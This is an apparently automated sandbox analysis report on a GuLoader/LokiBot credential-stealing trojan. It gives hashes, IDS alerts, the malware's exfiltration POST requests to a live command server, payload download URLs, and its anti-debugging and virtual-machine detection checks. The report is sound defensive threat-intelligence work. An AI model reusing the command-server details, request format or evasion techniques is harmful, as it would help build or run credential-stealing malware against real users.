
Analysis Report SecuriteInfo.com.Trojan.KillProc2.11384.14756.28239

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.KillProc2.11384.14756.28239 (renamed file extension from 28239 to exe)
Analysis ID: 271623
MD5: 1b96d90654b270e8c87f50599ef89ced
SHA1: 8fb7a9bf0b533e2f79a0f9e2c345fbfeb391207a
SHA256: 7c3b056caf85497f39a72bcdde137abc70b81612496a358a8627fd4994f84203

Detection

GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49745 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49745 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49748 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49748 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 195.69.140.147:80
Source: Traffic; Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 195.69.140.147:80
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: DC3240A4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: DC3240A4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: DC3240A4 | Content-Length: 165 | Connection: close
Source: global traffic; HTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: DC3240A4 | Content-Length: 165 | Connection: close
Source: unknown; TCP traffic detected without corresponding DNS query: 195.69.140.147 (this entry is repeated 35 times in the report)
Source: unknown; DNS traffic detected: queries for: onedrive.live.com
Source: unknown; HTTP traffic detected: POST /.op/cr.php/u1DEZ4oVQPK3w HTTP/1.0 | User-Agent: Mozilla/4.08 (Charon; Inferno) | Host: 195.69.140.147 | Accept: */* | Content-Type: application/octet-stream | Content-Encoding: binary | Content-Key: DC3240A4 | Content-Length: 192 | Connection: close
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 20 Aug 2020 04:56:16 GMT | Server: Apache | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Raw:
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: http://195.69.140.147/.op/cr.php/u1DEZ4oVQPK3w
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: http://microsoft.co
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: http://ocsp.msocsp.com0
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318589782.0000000000A3D000.00000004.00000020.sdmp; String found in binary or memory: https://6jp6pa.db.files.1drv.com/
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmp; String found in binary or memory: https://6jp6pa.db.files.1drv.com/y4mCwDL05cLjQD9_913AuqWJRHEZNn6rT7db90thaxk-i8hb07krQkDncEPj8iX348N
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318589782.0000000000A3D000.00000004.00000020.sdmp; String found in binary or memory: https://6jp6pa.db.files.1drv.com/~/
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmp; String found in binary or memory: https://onedrive.live.com/
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmp; String found in binary or memory: https://onedrive.live.com/Lk
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmp; String found in binary or memory: https://onedrive.live.com/download?cid=CEA27E82624AB94F&resid=CEA27E82624AB94F%21198&authkey=AGHwbcF
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318649331.0000000000A65000.00000004.00000020.sdmp; String found in binary or memory: https://www.digicert.com/CPS0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B788DA NtResumeThread, 0_2_02B788DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B77CC0 NtWriteVirtualMemory, 0_2_02B77CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B7847B NtProtectVirtualMemory, 0_2_02B7847B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B70727 EnumWindows, NtSetInformationThread, TerminateProcess, 0_2_02B70727
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B74319 NtSetInformationThread, TerminateProcess, 0_2_02B74319
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B734FF NtWriteVirtualMemory, 0_2_02B734FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B78AFB NtResumeThread, 0_2_02B78AFB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B788E3 NtResumeThread, 0_2_02B788E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B732C2 NtWriteVirtualMemory, 0_2_02B732C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B73035 NtWriteVirtualMemory, 0_2_02B73035
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B7883D NtProtectVirtualMemory, 0_2_02B7883D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B78C03 NtResumeThread, 0_2_02B78C03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B77273 NtSetInformationThread, TerminateProcess, 0_2_02B77273
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B78E43 NtResumeThread, 0_2_02B78E43
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B729BA NtWriteVirtualMemory, 0_2_02B729BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B70793 NtSetInformationThread, TerminateProcess, 0_2_02B70793
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B78FE7 NtResumeThread, 0_2_02B78FE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B789EB NtResumeThread, 0_2_02B789EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B78D17 NtResumeThread, 0_2_02B78D17
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B70762 NtSetInformationThread, TerminateProcess, 0_2_02B70762
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B7336B NtWriteVirtualMemory, 0_2_02B7336B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B7475E NtSetInformationThread, TerminateProcess, LoadLibraryA, 0_2_02B7475E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_0056847B NtProtectVirtualMemory, 1_2_0056847B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00562C78 LdrInitializeThunk, RtlAddVectoredExceptionHandler, LdrInitializeThunk, NtProtectVirtualMemory, LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00562C78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_005688DA NtSetInformationThread, 1_2_005688DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00562B4A CreateThread, TerminateThread, LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00562B4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00563B6B Sleep, LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00563B6B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00564319 NtSetInformationThread, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, InternetOpenA, LdrInitializeThunk, InternetOpenUrlA, 1_2_00564319
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00560727 EnumWindows, NtSetInformationThread, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, 1_2_00560727
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00563DE3 LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00563DE3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00568E43 NtSetInformationThread, 1_2_00568E43
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00567273 NtSetInformationThread, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, 1_2_00567273
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00568C03 NtSetInformationThread, 1_2_00568C03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_0056883D NtProtectVirtualMemory, 1_2_0056883D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00568AFB NtSetInformationThread, 1_2_00568AFB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00563CE3 LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00563CE3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_005688E3 NtSetInformationThread, 1_2_005688E3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00562CB9 LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00562CB9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00560F74 LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00560F74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00560762 NtSetInformationThread, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, 1_2_00560762
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00560F6F LdrInitializeThunk, NtProtectVirtualMemory, 1_2_00560F6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00568D17 NtSetInformationThread, 1_2_00568D17
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00568FE7 NtSetInformationThread, 1_2_00568FE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_005689EB NtSetInformationThread, 1_2_005689EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_00560793 NtSetInformationThread, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, LdrInitializeThunk, 1_2_00560793
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_00403B72 0_2_00403B72
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_0040B397 0_2_0040B397
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1288539224.00000000021B0000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenameuser32j% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000000.1270369826.0000000000413000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1321486691.000000001DC30000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamemswsock.dll.muij% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000000.1286898517.0000000000413000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1321501141.000000001DD80000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Binary or memory string: OriginalFilenameSUCH.exe vs SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe
Source: classification engine; Classification label: mal84.troj.spyw.evad.winEXE@3/2@2/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; File created: C:\Users\user\AppData\Local\Temp\~DF715A8C476E9ECCE9.TMP
Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; File read: C:\Windows\System32\drivers\etc\hosts (this entry is repeated 4 times in the report)
Source: unknown; Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe' (this entry is repeated 2 times in the report)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match; File source: 00000001.00000002.1318395857.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7032, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe PID: 7008, type: MEMORY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_00407ECB push ebx; iretd 0_2_00407ED2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_004084F0 push ss; iretd 0_2_004084FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_004058FC push esp; ret 0_2_004058FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_004090B5 push ss; retf 0_2_004090FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_004091BA push ss; retf 0_2_004091FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 0_2_02B7399C push ebp; retn FFFFh 0_2_02B75002
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe; Code function: 1_2_0056399C push ebp; retn FFFFh 1_2_00565002
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion:

            Tries to detect Any.run
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B7125A rdtsc 0_2_02B7125A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe TID: 6424 | Thread sleep count: 93 > 30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe TID: 6200 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Last function: Thread delayed
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: vmicvss
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWH9
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWb
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

            Anti Debugging:

            Contains functionality to hide a thread from the debugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B70727 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00010000,?,?,00000004 0_2_02B70727
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Process queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B7125A rdtsc 0_2_02B7125A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 1_2_00562C78 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 1_2_00562C78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B77CC0 mov eax, dword ptr fs:[00000030h] 0_2_02B77CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe | Code function: 0_2_02B7688A mov eax, dword ptr fs:[00000030h] 0_2_02B7688A
